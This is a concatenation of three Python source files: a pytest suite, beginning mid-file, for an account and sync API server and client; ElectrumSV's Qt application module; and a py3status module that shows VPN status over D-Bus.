pytest.xfail('PHP CLI server incorrectly aborts connection.')
assert False
if method in ('', ' '):
if 'Apache' in response.headers.get('Server', []):
# Apache responds correctly.
assert_method_not_allowed()
else:
# Python server (Werkzeug run_simple)
# only returns HTTP/0.9 - body of a 400 Bad Request.
mna = '405' in response.content
bad = '400' in response.content
assert mna or bad
return
if method in ('None', 'none', 'NONE',
'Null', 'null', 'NULL',
'CONNECT'):
assert response.status_code in (MethodNotAllowed.code,
NotImplemented.code,
BadRequest.code)
if response.status_code is MethodNotAllowed.code:
assert_method_not_allowed()
return
# All remaining methods.
assert_method_not_allowed()
def test_connection(self, req):
"""Test server 'test' function.
Auth should fail due to no account on server."""
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code # connection ok.
assert APIErrorResponse.AUTH_FAIL == response.content
def test_account_open(self, req, account_open_request_body):
"""Test server 'accountOpen' function."""
req.type = APIRequestType.ACCOUNT_OPEN
req.body = JSON.dumps(account_open_request_body.to_primitive())
response = requests.post(req.base_url, req.body,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.SUCCESS == response.content
def test_authentication(self, req):
"""Test server 'test' function.
Auth should pass."""
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.SUCCESS == response.content
def test_account_open_email_not_unique(self, req):
"""Test server 'accountOpen' function.
Existing client email (created above)."""
req.type = APIRequestType.ACCOUNT_OPEN
account_open_request_body = AccountOpenRequestBody()
account_open_request_body.clientUUID = uuid.uuid4() # unique uuid
req.body = JSON.dumps(account_open_request_body.to_primitive())
response = requests.post(req.base_url, req.body,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.EMAIL_NOT_UNIQUE == response.content
def test_account_open_uuid_not_unique(self, req,
account_open_request_body):
"""Test server 'accountOpen' function.
Existing client UUID (created above)."""
req.type = APIRequestType.ACCOUNT_OPEN
req.email = 'user2@example.com'
req.body = JSON.dumps(account_open_request_body.to_primitive())
response = requests.post(req.base_url, req.body,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.CLIENT_UUID_NOT_UNIQUE == response.content
def test_authentication_invalid_password_too_short(self, req):
"""Test server 'test' function.
Short invalid password. Auth simply fails don't leak why."""
req.password = 'short'
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.AUTH_FAIL == response.content
INVALID_KEYS = ('', ' ', 'notPrivate',
'*', '%', '$', '&', '@',
'None', 'none', 'NONE',
'Null', 'null', 'NULL')
@parametrize('key', INVALID_KEYS)
def test_invalid_key(self, req, key):
"""Test server 'test' function with an invalid key."""
req.key = key
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.INVALID_KEY == response.content
def test_sync_down(self, req, sync_down_request_body):
"""Test server 'syncDown' function."""
req.type = APIRequestType.SYNC_DOWN
req.body = JSON.dumps(sync_down_request_body.to_primitive())
response = requests.post(req.base_url, req.body,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
jo = response.json()
assert APIErrorCode.SUCCESS == jo[JSONKey.ERROR]
assert isinstance(jo[JSONKey.OBJECTS], list)
def test_sync_down_without_content_header(self, req):
"""Test server 'syncDown' function."""
req.type = APIRequestType.SYNC_DOWN
response = requests.post(req.base_url,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.MALFORMED_REQUEST == response.content
def test_sync_up(self, req, sync_up_request_body):
"""Test server 'syncUp' function."""
req.type = APIRequestType.SYNC_UP
req.body = JSON.dumps(sync_up_request_body.to_primitive())
response = requests.post(req.base_url, req.body,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
jo = response.json()
assert APIErrorCode.SUCCESS == jo[JSONKey.ERROR]
assert isinstance(jo[JSONKey.OBJECTS], list)
def test_sync_up_without_content_header(self, req):
"""Test server 'syncUp' function."""
req.type = APIRequestType.SYNC_UP
response = requests.post(req.base_url,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.MALFORMED_REQUEST == response.content
def test_authentication_email_not_specified(self, req):
"""Test server 'test' function with no email query param."""
req.email = None
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.AUTH_FAIL == response.content
def test_malformed_request_key_not_specified(self, req):
"""Test server 'test' function with no key query param."""
req.key = None
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.MALFORMED_REQUEST == response.content
def test_malformed_request_type_not_specified(self, req):
"""Test server when no request type is specified."""
req.type = None
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.MALFORMED_REQUEST == response.content
UNSUPPORTED_REQ_TYPE = ('', ' ', 'notSupported',
'*', '%', '$', '&', '@',
'None', 'none', 'NONE',
'Null', 'null', 'NULL')
@parametrize('req_type', UNSUPPORTED_REQ_TYPE)
def test_malformed_request_type_not_supported(self, req, req_type):
"""Test server when an unsupported request type is specified."""
req.type = req_type
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.MALFORMED_REQUEST == response.content
def test_account_close(self, req):
"""Test server 'accountClose' function."""
req.type = APIRequestType.ACCOUNT_CLOSE
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.SUCCESS == response.content
def test_authentication_closed_account(self, req):
"""Test server 'test' function. Auth should fail."""
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.AUTH_FAIL == response.content
@use_fixtures("session_fin_drop_create_tables")
class TestClient(object):
"""Client unit tests."""
@fixture(scope="class")
def client_a(self, base_url):
return client.Client(base_url, APP_KEYS[1],
'user@example.com', 'secret78901234')
@fixture(scope="class")
def client_b(self, base_url):
return client.Client(base_url, APP_KEYS[0],
'user@example.com', 'secret78901234')
@fixture(scope="function")
def mock_response(self):
return flexmock(status_code=200, content='{"error":0}')
def test_instantiate_client_a(self, client_a):
assert client_a
def test_instantiate_client_b(self, client_b):
assert client_b
def test_uuid_isinstance_of_uuid(self, client_a):
assert isinstance(client_a.UUID, uuid.UUID)
def test_uuid_is_unique(self, client_a, client_b):
assert client_a.UUID != client_b.UUID
def test_get_json(self, client_a, mock_response):
jo = client_a.get_json_object(mock_response)
assert mock_response.content == JSON.dumps(jo)
def test_get_json_non_ok_status_code(self, client_a, mock_response):
mock_response.status_code = 401
with pytest.raises(Exception):
client_a.get_json_object(mock_response)
BAD_CONTENT = ('', ' ', '*', '[]', '{}',
'None', 'none', 'NONE',
'Null', 'null', 'NULL',
'{"error":}', '{"objects":[]}')
@parametrize('content', BAD_CONTENT)
def test_get_json_bad_content(self, client_a,
mock_response, content):
mock_response.content = content
with pytest.raises(Exception):
client_a.get_json_object(mock_response)
@use_fixtures("session_fin_drop_create_tables")
class TestIntegration(object):
"""Test the API by exercising the client and server."""
@fixture(scope="class")
def client_a(self, base_url):
return client.Client(base_url,
APP_KEYS[1],
str(uuid.uuid4()) + '@example.com',
'secret78901234')
@fixture(scope="class")
def client_b(self, base_url):
return client.Client(base_url,
APP_KEYS[0],
str(uuid.uuid4()) + '@example.com',
'secret78901234')
def test_connection_a(self, client_a):
"""Test client_a's connection to server."""
result = client_a.check_connection()
assert True == result
def test_connection_b(self, client_b):
"""Test client_b's connection to server."""
result = client_b.check_connection()
assert True == result
def test_account_open(self, client_a):
"""Test opening an account."""
result = client_a.account_open()
assert True == result
def test_account_authentication(self, client_a):
"""Test authentication of the account created above."""
result = client_a.check_authentication()
assert True == result
def test_account_authentication_wrong_password(self, client_a):
"""Test authentication of the account created above.
Wrong password."""
saved_password = client_a.password
client_a.password = 'secret789012345' # set wrong password
result = client_a.check_authentication()
client_a.password = saved_password
assert False == result
def test_account_open_email_not_unique(self, client_a):
"""Test opening an account with the same email as above."""
result = client_a.account_open()
assert False == result
def test_account_open_invalid_password_too_short(self, client_b):
"""Test opening an account with a password that is too short."""
saved_password = client_b.password
client_b.password = 'secret7890123' # set short password
result = client_b.account_open()
client_b.password = saved_password
assert False == result
def test_account_open_invalid_email_syntax(self, client_b):
"""Test opening an account with an invalid email syntax."""
saved_email = client_b.email
client_b.email = str(uuid.uuid4()) + 'example.com' # missing '@'
result = client_b.account_open()
client_b.email = saved_email
assert False == result
def test_account_modify_password(self, client_a):
"""Test modifying the account password created by client_a."""
new_password = 'secret78901235'
result = client_a.account_modify(client_a.email, new_password)
client_a.password = new_password
assert True == result
def test_account_authentication_changed_password(self, client_a):
"""Test authentication of the account modified above."""
result = client_a.check_authentication()
assert True == result
def test_account_modify_email(self, client_a):
"""Test modifying the account email created by client_a."""
new_email = str(uuid.uuid4()) + '@example.com'
result = client_a.account_modify(new_email, client_a.password)
client_a.email = new_email
assert True == result
def test_account_authentication_changed_email(self, client_a):
"""Test authentication of the account modified above."""
result = client_a.check_authentication()
assert True == result
def test_account_modify_password_and_email(self, client_a):
"""Test modifying the account created by client_a."""
new_password = 'secret78901236'
new_email = str(uuid.uuid4()) + '@example.com'
result = client_a.account_modify(new_email, new_password)
client_a.password = new_password
client_a.email = new_email
assert True == result
def test_account_authentication_changed_password_and_email(self, client_a):
"""Test authentication of the account modified above."""
result = client_a.check_authentication()
assert True == result
def test_account_modify_wrong_password(self, client_a):
"""Test modify of the account created above with wrong password."""
new_password = 'secret78901238'
new_email = str(uuid.uuid4()) + '@example.com'
saved_password = client_a.password
client_a.password = 'secret78901237' # set wrong password
result = client_a.account_modify(new_email, new_password)
client_a.password = saved_password
assert False == result
def test_account_authentication_unchanged_password_and_email(self,
client_a):
"""Test authentication of the unchanged account above."""
result = client_a.check_authentication()
assert True == result
def test_account_modify_email_with_no_account(self, client_b):
"""Test modifying an account.
Email that does not have an account."""
result = client_b.account_modify(client_b.email, client_b.password)
assert False == result
def test_account_close_wrong_password(self, client_a):
"""Test closing of the account created by client_a.
Wrong password."""
saved_password = client_a.password
client_a.password = 'secret78901237' # set wrong password
result = client_a.account_close()
client_a.password = saved_password
assert False == result
def test_account_authentication_unclosed_account(self, client_a):
"""Test authentication of the unclosed account above."""
result = client_a.check_authentication()
assert True == result
def test_account_close(self, client_a):
"""Test closing an account."""
result = client_a.account_close()
assert True == result
def test_account_authentication_closed_account(self, client_a):
"""Test authentication of the account closed above."""
result = client_a.check_authentication()
assert False == result
@use_fixtures("session_fin_drop_create_tables")
class TestMultipleClientIntegration(object):
"""Test the API by exercising multiple clients and server."""
@fixture(scope="class")
def client_a(self, base_url):
return client.Client(base_url, APP_KEYS[1],
'user@example.com', 'secret78901234')
@fixture(scope="class")
def client_b(self, base_url):
return client.Client(base_url, APP_KEYS[0],
'user@example.com', 'secret78901234')
def test_connection_with_sequential_clients(self, client_a, client_b):
for x in xrange(8):
r1 = client_a.check_connection()
r2 = client_b.check_connection()
assert True == r1
assert True == r2
def test_connection_with_parallel_clients(self, client_a, base_url):
"""Parallel clients.
Client A is run in the test process while client C is run in another
process. This allows genuine parallel execution of the client module
code in Python. Connections to the server are effectively a race
condition for each client."""
from multiprocessing import Process, Queue
def run_client_a():
short_uuid = str(client_a.UUID)[:6]
for x in xrange(8):
print 'client a, short UUID:', short_uuid
r1 = client_a.check_connection()
assert True == r1
def run_client_c(q, url):
r = True
client_c = client.Client(url, APP_KEYS[1],
'user@example.com', 'secret78901234')
short_uuid = str(client_c.UUID)[:6]
for x in xrange(8):
print 'client c, short UUID:', short_uuid
if client_c.check_connection() is False:
r = False
q.put(r)
queue = Queue()
Process(target=run_client_c, args=(queue, base_url)).start()
run_client_a()
client_c_result = queue.get()
assert True == client_c_result
def get_cmd_args():
"""Get the command line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument("--remote-server", action='store_true',
help="use when running against a remote server")
parser.add_argument("--baseurl", help="specify the server base url")
parser.add_argument("-k",
help="only run tests matching the given substring "
"expression")
return parser.parse_args()
def get_pytest_args(file_name, cmd_args):
"""Build and return the pytest arguments."""
# PyTest argument list: verbose, exit on first failure and caplog format.
args = ['-vx', '--log-format=%(levelname)s:%(name)s:%(message)s']
if cmd_args.remote_server:
args.append('--remote-server')
# Optional command line argument specifying the server base url.
if cmd_args.baseurl:
args.append('--baseurl')
args.append(cmd_args.baseurl)
# Specify this file as the only test file.
args.append(file_name)
# Optional command line argument to only run tests matching the given
# substring expression.
if cmd_args.k:
args.append('-k %s' % cmd_args.k)
return args
def main(file_name):
"""Run the test suite."""
cmd_args = get_cmd_args()
args = get_pytest_args(file_name, cmd_args)
# Run PyTest with the supplied args.
# Equivalent to PyTest command line:
# env/bin/py.test -vx --log-format="%(levelname)s:%(name)s:%(message)s"
# --baseurl "http://0.0.0.0:8080/" tests.py -k "TestServer"
pytest.main(args)
# Run main when commands read either from standard input,
# from a script file, or from an interactive prompt.
if __name__ == "__main__":
main(__file__)
|
app.py
|
# ElectrumSV - lightweight Bitcoin client
# Copyright (C) 2019-2020 The ElectrumSV Developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''ElectrumSV application.'''
import concurrent.futures
import datetime
import os
from functools import partial
import signal
import sys
import threading
from typing import Any, Callable, cast, Coroutine, Iterable, List, Optional, TypeVar
from aiorpcx import run_in_thread
import PyQt5.QtCore as QtCore
from PyQt5.QtCore import pyqtSignal, QEvent, QObject, QTimer
from PyQt5.QtGui import QFileOpenEvent, QGuiApplication, QIcon
from PyQt5.QtWidgets import QApplication, QSystemTrayIcon, QMenu, QWidget, QDialog
from electrumsv.app_state import app_state, ExceptionHandlerABC
from electrumsv.contacts import ContactEntry, ContactIdentity
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.types import ExceptionInfoType
from electrumsv.util import UpdateCheckResultType
from electrumsv.wallet import AbstractAccount, Wallet
from . import dialogs, network_dialog
from .cosigner_pool import CosignerPool
from .main_window import ElectrumWindow
from .exception_window import Exception_Hook
from .label_sync import LabelSync
from .log_window import SVLogWindow, SVLogHandler
from .util import ColorScheme, get_default_language, MessageBox, read_QIcon
from .wallet_wizard import WalletWizard
T1 = TypeVar("T1")
logger = logs.get_logger('app')
class OpenFileEventFilter(QObject):
def __init__(self, windows: List[ElectrumWindow]) -> None:
super().__init__()
self.windows = windows
def eventFilter(self, obj: QObject, event: QEvent) -> bool:
if event.type() == QtCore.QEvent.Type.FileOpen:
if len(self.windows) >= 1:
self.windows[0].pay_to_URI(cast(QFileOpenEvent, event).url().toString())
return True
return False
class SVApplication(QApplication):
# Signals need to be on a QObject
create_new_window_signal = pyqtSignal(object, object, bool)
cosigner_received_signal = pyqtSignal(object, object)
labels_changed_signal = pyqtSignal(object, object, object)
window_opened_signal = pyqtSignal(object)
window_closed_signal = pyqtSignal(object)
# Async tasks
async_tasks_done = pyqtSignal()
# Logging
new_category = pyqtSignal(str)
new_log = pyqtSignal(object)
# Preferences updates
fiat_ccy_changed = pyqtSignal()
custom_fee_changed = pyqtSignal()
op_return_enabled_changed = pyqtSignal()
num_zeros_changed = pyqtSignal()
base_unit_changed = pyqtSignal()
fiat_history_changed = pyqtSignal()
fiat_balance_changed = pyqtSignal()
update_check_signal = pyqtSignal(bool, object)
# Contact events
contact_added_signal = pyqtSignal(object, object)
contact_removed_signal = pyqtSignal(object)
identity_added_signal = pyqtSignal(object, object)
identity_removed_signal = pyqtSignal(object, object)
def __init__(self, argv: List[str]) -> None:
QtCore.QCoreApplication.setAttribute(QtCore.Qt.ApplicationAttribute.AA_X11InitThreads)
if hasattr(QtCore.Qt, "AA_ShareOpenGLContexts"):
QtCore.QCoreApplication.setAttribute(
QtCore.Qt.ApplicationAttribute.AA_ShareOpenGLContexts)
if hasattr(QGuiApplication, 'setDesktopFileName'):
QGuiApplication.setDesktopFileName('electrum-sv.desktop')
super().__init__(argv)
self.windows: List[ElectrumWindow] = []
self.log_handler = SVLogHandler()
self.log_window: Optional[SVLogWindow] = None
self.net_dialog: Optional[network_dialog.NetworkDialog] = None
self.timer = QTimer(self)
self.exception_hook: Optional[ExceptionHandlerABC] = None
# A floating point number, e.g. 129.1
self.dpi = self.primaryScreen().physicalDotsPerInch()
# init tray
self.dark_icon = app_state.config.get("dark_icon", False)
self.tray = QSystemTrayIcon(self._tray_icon(), None)
self.tray.setToolTip('ElectrumSV')
self.tray.activated.connect(self._tray_activated)
self._build_tray_menu()
self.tray.show()
# FIXME Fix what.. what needs to be fixed here?
app_state.config.get('language', get_default_language())
logs.add_handler(self.log_handler)
self._start()
def _start(self) -> None:
self.setWindowIcon(read_QIcon("electrum-sv.png"))
self.installEventFilter(OpenFileEventFilter(self.windows))
self.create_new_window_signal.connect(self.start_new_window)
self.async_tasks_done.connect(app_state.async_.run_pending_callbacks)
self.num_zeros_changed.connect(partial(self._signal_all, 'on_num_zeros_changed'))
self.fiat_ccy_changed.connect(partial(self._signal_all, 'on_fiat_ccy_changed'))
self.base_unit_changed.connect(partial(self._signal_all, 'on_base_unit_changed'))
self.fiat_history_changed.connect(partial(self._signal_all, 'on_fiat_history_changed'))
# Toggling of showing addresses in the fiat preferences.
self.fiat_balance_changed.connect(partial(self._signal_all, 'on_fiat_balance_changed'))
self.update_check_signal.connect(partial(self._signal_all, 'on_update_check'))
ColorScheme.update_from_widget(QWidget())
def _signal_all(self, method: str, *args: str) -> None:
for window in self.windows:
getattr(window, method)(*args)
def _close(self) -> None:
for window in self.windows:
window.close()
def close_window(self, window: ElectrumWindow) -> None:
# NOTE: `ElectrumWindow` removes references to itself while it is closing. This creates
# a problem where it gets garbage collected before it's Qt5 `closeEvent` handling is
# completed and on Linux/MacOS it segmentation faults. On Windows, it is fine.
QTimer.singleShot(0, partial(self._close_window, window))
logger.debug("app.close_window.queued")
def _close_window(self, window: ElectrumWindow) -> None:
logger.debug(f"app.close_window.executing {window!r}")
app_state.daemon.stop_wallet_at_path(window._wallet.get_storage_path())
self.windows.remove(window)
self.window_closed_signal.emit(window)
self._build_tray_menu()
if not self.windows:
self._last_window_closed()
def setup_app(self) -> None:
# app_state.daemon is initialised after app. Setup things dependent on daemon here.
pass
def _build_tray_menu(self) -> None:
# Avoid immediate GC of old menu when window closed via its action
if self.tray.contextMenu() is None:
m = QMenu()
self.tray.setContextMenu(m)
else:
m = self.tray.contextMenu()
m.clear()
for window in self.windows:
submenu = m.addMenu(window._wallet.name())
submenu.addAction(_("Show/Hide"), window.show_or_hide)
# NOTE(typing) Need to pretend things that Qt uses return nothing.
submenu.addAction(_("Close"), cast(Callable[..., None], window.close))
m.addAction(_("Dark/Light"), self._toggle_tray_icon)
m.addSeparator()
m.addAction(_("Exit ElectrumSV"), self._close)
self.tray.setContextMenu(m)
def _tray_icon(self) -> QIcon:
if self.dark_icon:
return read_QIcon('electrumsv_dark_icon.png')
else:
return read_QIcon('electrumsv_light_icon.png')
def _toggle_tray_icon(self) -> None:
self.dark_icon = not self.dark_icon
app_state.config.set_key("dark_icon", self.dark_icon, True)
self.tray.setIcon(self._tray_icon())
def _tray_activated(self, reason: QSystemTrayIcon.ActivationReason) -> None:
if reason == QSystemTrayIcon.ActivationReason.DoubleClick:
if all([w.is_hidden() for w in self.windows]):
for w in self.windows:
w.bring_to_top()
else:
for w in self.windows:
w.hide()
def new_window(self, path: Optional[str], uri: Optional[str]=None) -> None:
# Use a signal as can be called from daemon thread
self.create_new_window_signal.emit(path, uri, False)
def show_network_dialog(self, parent: ElectrumWindow) -> None:
if not app_state.daemon.network:
parent.show_warning(_('You are using ElectrumSV in offline mode; restart '
'ElectrumSV if you want to get connected'), title=_('Offline'))
return
if self.net_dialog:
self.net_dialog._event_network_updated()
self.net_dialog.show()
self.net_dialog.raise_()
return
# from importlib import reload
# reload(network_dialog)
network = app_state.daemon.network
assert network is not None
self.net_dialog = network_dialog.NetworkDialog(network)
self.net_dialog.show()
def show_log_viewer(self) -> None:
if self.log_window is None:
self.log_window = SVLogWindow(None, self.log_handler)
self.log_window.show()
def _last_window_closed(self) -> None:
for dialog in (self.net_dialog, self.log_window):
if dialog:
dialog.accept()
def on_transaction_label_change(self, account: AbstractAccount, tx_hash: bytes, text: str) \
-> None:
self.label_sync.set_transaction_label(account, tx_hash, text)
def on_keyinstance_label_change(self, account: AbstractAccount, key_id: int, text: str) -> None:
self.label_sync.set_keyinstance_label(account, key_id, text)
def _create_window_for_wallet(self, wallet: Wallet) -> ElectrumWindow:
w = ElectrumWindow(wallet)
self.windows.append(w)
self._build_tray_menu()
self._register_wallet_events(wallet)
self.window_opened_signal.emit(w)
return w
def _register_wallet_events(self, wallet: Wallet) -> None:
# NOTE(typing) Some typing nonsense about not being able to assign to a method.
wallet.contacts._on_contact_added = self._on_contact_added # type: ignore[assignment]
wallet.contacts._on_contact_removed = self._on_contact_removed # type: ignore[assignment]
wallet.contacts._on_identity_added = self._on_identity_added # type: ignore[assignment]
wallet.contacts._on_identity_removed = self._on_identity_removed # type: ignore[assignment]
def _on_identity_added(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.identity_added_signal.emit(contact, identity)
def _on_identity_removed(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.identity_removed_signal.emit(contact, identity)
def _on_contact_added(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.contact_added_signal.emit(contact, identity)
def _on_contact_removed(self, contact: ContactEntry) -> None:
self.contact_removed_signal.emit(contact)
def get_wallets(self) -> Iterable[Wallet]:
return [ window._wallet for window in self.windows ]
def get_wallet_window(self, path: str) -> Optional[ElectrumWindow]:
for w in self.windows:
if w._wallet.get_storage_path() == path:
return w
return None
def get_wallet_window_by_id(self, account_id: int) -> Optional[ElectrumWindow]:
for w in self.windows:
for account in w._wallet.get_accounts():
if account.get_id() == account_id:
return w
return None
def start_new_window(self, wallet_path: Optional[str], uri: Optional[str]=None,
is_startup: bool=False) -> Optional[ElectrumWindow]:
'''Raises the window for the wallet if it is open. Otherwise
opens the wallet and creates a new window for it.'''
for w in self.windows:
if w._wallet.get_storage_path() == wallet_path:
w.bring_to_top()
break
else:
wizard_window: Optional[WalletWizard] = None
if wallet_path is not None:
open_result = WalletWizard.attempt_open(wallet_path)
if open_result.was_aborted:
return None
if not open_result.is_valid:
wallet_filename = os.path.basename(wallet_path)
MessageBox.show_error(
_("Unable to load file '{}'.").format(wallet_filename))
return None
wizard_window = open_result.wizard
else:
wizard_window = WalletWizard(is_startup=is_startup)
if wizard_window is not None:
result = wizard_window.run()
# This will return Accepted in some failure cases, like migration failure, due
# to wallet wizard standard buttons not being easily dynamically changeable.
if result != QDialog.Accepted:
return None
wallet_path = wizard_window.get_wallet_path()
if wallet_path is None:
return None
# All paths leading to this obtain a password and put it in the credential cache.
assert wallet_path is not None
wallet = app_state.daemon.load_wallet(wallet_path)
assert wallet is not None
w = self._create_window_for_wallet(wallet)
if uri:
w.pay_to_URI(uri)
w.bring_to_top()
w.setWindowState(QtCore.Qt.WindowState(
(int(w.windowState()) & ~QtCore.Qt.WindowState.WindowMinimized) |
QtCore.Qt.WindowState.WindowActive))
# this will activate the window
w.activateWindow()
return w
def update_check(self) -> None:
if (not app_state.config.get('check_updates', True) or
app_state.config.get("offline", False)):
return
def f() -> None:
import requests
try:
response = requests.request(
'GET', "https://electrumsv.io/release.json",
headers={'User-Agent' : 'ElectrumSV'}, timeout=10)
result = response.json()
self._on_update_check(True, result)
except Exception:
self._on_update_check(False, cast(ExceptionInfoType, sys.exc_info()))
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def _on_update_check(self, success: bool, result: UpdateCheckResultType) -> None:
if success:
when_checked = datetime.datetime.now().astimezone().isoformat()
app_state.config.set_key('last_update_check', result)
app_state.config.set_key('last_update_check_time', when_checked, True)
self.update_check_signal.emit(success, result)
def initial_dialogs(self) -> None:
'''Suppressible dialogs that are shown when first opening the app.'''
dialogs.show_named('welcome-ESV-1.4.0b1')
def event_loop_started(self) -> None:
self.cosigner_pool = CosignerPool()
self.label_sync = LabelSync()
if app_state.config.get("show_crash_reporter", default=True):
self.exception_hook = cast(ExceptionHandlerABC, Exception_Hook(self))
self.timer.start()
signal.signal(signal.SIGINT, lambda *args: self.quit())
self.initial_dialogs()
path = app_state.config.get_cmdline_wallet_filepath()
if not self.start_new_window(path, app_state.config.get('url'), is_startup=True):
self.quit()
def run_app(self) -> None:
when_started = datetime.datetime.now().astimezone().isoformat()
app_state.config.set_key('previous_start_time', app_state.config.get("start_time"))
app_state.config.set_key('start_time', when_started, True)
self.update_check()
threading.current_thread().setName('GUI')
self.timer.setSingleShot(False)
self.timer.setInterval(500) # msec
self.timer.timeout.connect(app_state.device_manager.timeout_clients)
QTimer.singleShot(0, self.event_loop_started)
self.exec_()
logs.remove_handler(self.log_handler)
# Shut down the timer cleanly
self.timer.stop()
# clipboard persistence
# see http://www.mail-archive.com/pyqt@riverbankcomputing.com/msg17328.html
event = QtCore.QEvent(QtCore.QEvent.Type.Clipboard)
self.sendEvent(self.clipboard(), event)
self.tray.hide()
def run_coro(self, coro: Callable[..., Coroutine[Any, Any, T1]], *args: Any,
on_done: Optional[Callable[[concurrent.futures.Future[T1]], None]]=None) \
-> concurrent.futures.Future[T1]:
'''Run a coroutine. on_done, if given, is passed the future containing the reuslt or
exception, and is guaranteed to be called in the context of the GUI thread.
'''
def task_done(future: concurrent.futures.Future[T1]) -> None:
self.async_tasks_done.emit()
future = app_state.async_.spawn(coro, *args, on_done=on_done)
future.add_done_callback(task_done)
return future
def run_in_thread(self, func: Callable[..., T1], *args: Any,
on_done: Optional[Callable[[concurrent.futures.Future[T1]], None]]=None) \
-> concurrent.futures.Future[T1]:
'''Run func(*args) in a thread. on_done, if given, is passed the future containing the
reuslt or exception, and is guaranteed to be called in the context of the GUI
thread.
'''
return self.run_coro(run_in_thread, func, *args, on_done=on_done)
|
vpn_status.py
|
# -*- coding: utf-8 -*-
"""
Drop-in replacement for i3status run_watch VPN module.
Expands on the i3status module by displaying the name of the connected vpn
using pydbus. Asynchronously updates on dbus signals unless check_pid is True.
Configuration parameters:
cache_timeout: How often to refresh in seconds when check_pid is True.
(default 10)
check_pid: If True, act just like the default i3status module.
(default False)
format: Format of the output.
(default 'VPN: {name}|VPN: no')
pidfile: Same as i3status.conf pidfile, checked when check_pid is True.
(default '/sys/class/net/vpn0/dev_id')
Format placeholders:
{name} The name and/or status of the VPN.
Color options:
color_bad: VPN connected
color_good: VPN down
Requires:
pydbus: Which further requires PyGi. Check your distribution's repositories.
@author Nathan Smith <nathan AT praisetopia.org>
SAMPLE OUTPUT
{'color': '#00FF00', 'full_text': u'VPN: yes'}
off
{'color': '#FF0000', 'full_text': u'VPN: no'}
"""
from pydbus import SystemBus
from gi.repository import GObject
from threading import Thread
from os import path
from time import sleep
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 10
check_pid = False
format = "VPN: {name}|VPN: no"
pidfile = "/sys/class/net/vpn0/dev_id"
def post_config_hook(self):
self.thread_started = False
self.active = []
def _start_handler_thread(self):
"""Called once to start the event handler thread."""
# Create handler thread
t = Thread(target=self._start_loop)
t.daemon = True
# Start handler thread
t.start()
self.thread_started = True
def _start_loop(self):
"""Starts main event handler loop, run in handler thread t."""
# Create our main loop, get our bus, and add the signal handler
loop = GObject.MainLoop()
bus = SystemBus()
manager = bus.get(".NetworkManager")
manager.onPropertiesChanged = self._vpn_signal_handler
# Loop forever
loop.run()
def _vpn_signal_handler(self, args):
"""Called on NetworkManager PropertiesChanged signal"""
# Args is a dictionary of changed properties
# We only care about changes in ActiveConnections
active = "ActiveConnections"
# Compare current ActiveConnections to last seen ActiveConnections
if active in args.keys() and sorted(self.active) != sorted(args[active]):
self.active = args[active]
self.py3.update()
def _get_vpn_status(self):
"""Returns None if no VPN active, Id if active."""
# Sleep for a bit to let any changes in state finish
sleep(0.3)
# Check if any active connections are a VPN
bus = SystemBus()
ids = []
for name in self.active:
conn = bus.get(".NetworkManager", name)
if conn.Vpn:
ids.append(conn.Id)
# No active VPN
return ids
def _check_pid(self):
"""Returns True if pidfile exists, False otherwise."""
return path.isfile(self.pidfile)
# Method run by py3status
def return_status(self):
"""Returns response dict"""
# Start signal handler thread if it should be running
if not self.check_pid and not self.thread_started:
self._start_handler_thread()
# Set color_bad as default output. Replaced if VPN active.
name = None
color = self.py3.COLOR_BAD
# If we are acting like the default i3status module
if self.check_pid:
if self._check_pid():
name = "yes"
color = self.py3.COLOR_GOOD
# Otherwise, find the VPN name, if it is active
else:
vpn = self._get_vpn_status()
if vpn:
name = ", ".join(vpn)
color = self.py3.COLOR_GOOD
# Format and create the response dict
full_text = self.py3.safe_format(self.format, {"name": name})
response = {
"full_text": full_text,
"color": color,
